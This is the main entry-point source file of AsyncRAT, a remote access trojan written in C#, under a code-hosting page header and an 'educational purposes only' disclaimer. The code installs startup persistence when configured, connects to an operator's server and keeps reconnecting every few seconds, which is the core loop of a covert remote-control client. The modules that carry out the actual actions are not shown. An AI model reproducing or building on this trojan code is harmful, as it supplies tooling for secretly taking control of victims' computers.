35 lines
727 B
C#
35 lines
727 B
C#
using System.Threading;
|
|
using Client.Sockets;
|
|
using Client.Install;
|
|
using System;
|
|
|
|
// │ Author : NYAN CAT
|
|
// │ Name : AsyncRAT // Simple Socket
|
|
|
|
// Contact Me : https://github.com/NYAN-x-CAT
|
|
|
|
// This program Is distributed for educational purposes only.
|
|
|
|
|
|
namespace Client
|
|
{
|
|
class Program
|
|
{
|
|
|
|
|
|
static void Main()
|
|
{
|
|
if (Convert.ToBoolean(Settings.Install))
|
|
NormalStartup.Install();
|
|
|
|
ClientSocket.InitializeClient();
|
|
|
|
while (true)
|
|
{
|
|
if (ClientSocket.Connected == false)
|
|
ClientSocket.Reconnect();
|
|
Thread.Sleep(2500);
|
|
}
|
|
}
|
|
}
|
|
} |